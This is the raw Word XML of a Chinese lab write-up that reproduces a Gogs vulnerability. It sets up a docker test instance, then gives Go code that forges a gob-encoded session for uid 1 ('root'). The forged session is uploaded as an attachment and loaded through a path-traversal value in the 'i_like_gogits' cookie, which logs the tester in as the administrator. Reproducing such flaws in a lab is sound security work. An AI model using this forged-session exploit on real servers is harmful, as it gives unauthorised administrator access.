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0E7E53" w:rsidRDefault="000E7E53">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7E53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7E53" w:rsidRDefault="000E7E53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0E7E53" w:rsidRDefault="00E215DA">
      <w:r w:rsidRPr="00E215DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="129882"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1" name="图片 1" descr="C:\Users\Toby\AppData\Local\Temp\165348746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87462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53" w:rsidRDefault="000E7E53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问3</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，选择s</w:t>
      </w:r>
      <w:r>
        <w:t>qlite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库，开启注册功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7E53" w:rsidRDefault="00E215DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F1BA33" wp14:editId="69BC2ADB">
            <wp:extent cx="5274310" cy="1922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53" w:rsidRDefault="000E7E53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、安装完成后，重启服务：d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker-compose restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7E53" w:rsidRDefault="00E215DA">
      <w:r w:rsidRPr="00E215DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="159008"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="C:\Users\Toby\AppData\Local\Temp\165348757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87574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53" w:rsidRDefault="000E7E53"/>
    <w:p w:rsidR="000E7E53" w:rsidRPr="000E7E53" w:rsidRDefault="000E7E53">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7E53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E215DA" w:rsidRDefault="000E7E53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、生成序列化文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B153F1" w:rsidRDefault="00E215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251450" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2540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5DA" w:rsidRPr="00E215DA" w:rsidRDefault="00E215DA" w:rsidP="00E215DA">
                            <w:pPr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package main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import (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"bytes"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"encoding/gob"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"encoding/hex"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"fmt"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"io/ioutil"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"os"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func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) {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for _, v := range obj {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    gob.Register(v)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}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buf := bytes.NewBuffer(nil)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err := gob.NewEncoder(buf).Encode(obj)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return buf.Bytes(), err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func main() {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var uid int64 = 1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obj := map[interface{}]interface{}{"_old_uid": "1", "uid": uid, "uname": "root"}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data, err := EncodeGob(obj)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if err != nil {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    fmt.Println(err)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}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err = ioutil.WriteFile("data", data, os.O_CREATE|os.O_WRONLY)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if err != nil {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    fmt.Println(err)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}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edata := hex.EncodeToString(data)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E215DA" w:rsidRPr="00E215DA" w:rsidRDefault="00E215DA" w:rsidP="00E215D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</w:pPr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 xml:space="preserve">    fmt.Println(edata)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E215DA" w:rsidRDefault="00E215DA" w:rsidP="00E215DA">
                            <w:r w:rsidRPr="00E215DA">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="4A4A4A"/>
                                <w:spacing w:val="10"/>
                                <w:kern w:val="0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55pt;width:41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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00E215DA" w:rsidRPr="00E215DA" w:rsidRDefault="00E215DA" w:rsidP="00E215DA">
                      <w:pPr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package main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import (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"bytes"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"encoding/gob"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"encoding/hex"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"fmt"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"io/ioutil"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"os"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func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) {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for _, v := range obj {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    gob.Register(v)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}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buf := bytes.NewBuffer(nil)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err := gob.NewEncoder(buf).Encode(obj)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return buf.Bytes(), err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}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func main() {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var uid int64 = 1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obj := map[interface{}]interface{}{"_old_uid": "1", "uid": uid, "uname": "root"}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data, err := EncodeGob(obj)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if err != nil {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    fmt.Println(err)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}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err = ioutil.WriteFile("data", data, os.O_CREATE|os.O_WRONLY)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if err != nil {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    fmt.Println(err)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}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edata := hex.EncodeToString(data)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E215DA" w:rsidRPr="00E215DA" w:rsidRDefault="00E215DA" w:rsidP="00E215DA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</w:pPr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 xml:space="preserve">    fmt.Println(edata)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E215DA" w:rsidRDefault="00E215DA" w:rsidP="00E215DA">
                      <w:r w:rsidRPr="00E215DA">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="4A4A4A"/>
                          <w:spacing w:val="10"/>
                          <w:kern w:val="0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7E53" w:rsidRDefault="000E7E53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、注册一个普通用户账号、创建项目，再“版本发布”页面上传刚生成的s</w:t>
      </w:r>
      <w:r>
        <w:t>ession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E215DA" w:rsidRDefault="00E215DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A89F49" wp14:editId="656C4BCC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DA" w:rsidRDefault="00E215DA"/>
    <w:p w:rsidR="000E7E53" w:rsidRDefault="000E7E53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、通过附件的U</w:t>
      </w:r>
      <w:r>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到文件的文件名：.</w:t>
      </w:r>
      <w:r w:rsidR="00B153F1" w:rsidRPr="00B153F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF512A" w:rsidRPr="00AF512A">
        <w:t>/attachments/97282cb1-f46d-4175-bcb4-ac541dba8b12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E215DA" w:rsidRDefault="00E215DA">
      <w:r w:rsidRPr="00E215DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2392659"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="5" name="图片 5" descr="C:\Users\Toby\AppData\Local\Temp\16534896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489698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53" w:rsidRDefault="000E7E53">
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、构造Co</w:t>
      </w:r>
      <w:r>
        <w:t>okie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7E53">
        <w:t>i_like_gogits=..</w:t>
      </w:r>
      <w:r w:rsidR="00AF512A" w:rsidRPr="00AF512A">
        <w:t xml:space="preserve"> /attachments/</w:t>
      </w:r>
      <w:r w:rsidR="00121B7C">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00121B7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00121B7C">
        <w:t>7/</w:t>
      </w:r>
      <w:r w:rsidR="00AF512A" w:rsidRPr="00AF512A">
        <w:t>97282cb1-f46d-4175-bcb4-ac541dba8b12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功登录i</w:t>
      </w:r>
      <w:r>
        <w:t>d=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用户（管理员）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E215DA" w:rsidRDefault="00121B7C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52684EDB" wp14:editId="00F3C06C">
            <wp:extent cx="5274310" cy="2499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AC" w:rsidRDefault="002931AC" w:rsidP="000E7E53">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002931AC" w:rsidRDefault="002931AC" w:rsidP="000E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AC" w:rsidRDefault="002931AC" w:rsidP="000E7E53">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002931AC" w:rsidRDefault="002931AC" w:rsidP="000E7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6"/>
    <w:rsid w:val="000E7E53"/>
    <w:rsid w:val="00121B7C"/>
    <w:rsid w:val="002931AC"/>
    <w:rsid w:val="00AF512A"/>
    <w:rsid w:val="00B12406"/>
    <w:rsid w:val="00B153F1"/>
    <w:rsid w:val="00B512F2"/>
    <w:rsid w:val="00D20764"/>
    <w:rsid w:val="00E215DA"/>
    <w:rsid w:val="00F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E7B58"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{218F4D47-8879-4B80-98BC-B5C3F9DE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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-25T13:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-25T15:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>